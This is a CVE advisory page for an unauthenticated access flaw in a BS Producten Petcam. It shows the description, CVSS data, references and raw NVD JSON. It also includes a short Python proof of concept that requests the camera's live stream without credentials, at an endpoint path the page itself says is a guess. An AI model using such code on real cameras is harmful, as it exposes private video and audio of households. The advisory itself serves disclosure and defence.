CVE-2025-69988

Description

BS Producten Petcam 33.1.0.0818 is vulnerable to Incorrect Access Control. An unauthenticated attacker in physical proximity can associate with this open network. Once connected, the attacker gains access to the camera's private network interface and can retrieve sensitive information, including the live video and audio stream, without providing credentials.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BS Producten Petcam 33.1.0.0818

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target IP address after connecting to the open network
target_ip = "192.168.1.100"

# Example endpoint for the video stream (specific path may vary based on firmware)
stream_url = f"http://{target_ip}/live/stream.mjpeg"

try:
    # Attempt to access the stream without authentication headers
    response = requests.get(stream_url, timeout=5)
    
    if response.status_code == 200:
        print("[+] Successfully accessed the video stream without authentication.")
        print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
        # In a real scenario, this data could be saved to a file
    else:
        print(f"[-] Failed to access stream. HTTP Status: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69988
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69988
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69988/
[4] VulDB https://vuldb.com/cve/CVE-2025-69988
[5] https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2025-69988.md
[6] https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2025-69988.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69988", "sourceIdentifier": "[email protected]", "published": "2026-03-27T15:16:46.017", "lastModified": "2026-05-19T18:08:17.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BS Producten Petcam 33.1.0.0818 is vulnerable to Incorrect Access Control. An unauthenticated attacker in physical proximity can associate with this open network. Once connected, the attacker gains access to the camera's private network interface and can retrieve sensitive information, including the live video and audio stream, without providing credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2025-69988.md", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2025-69988.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}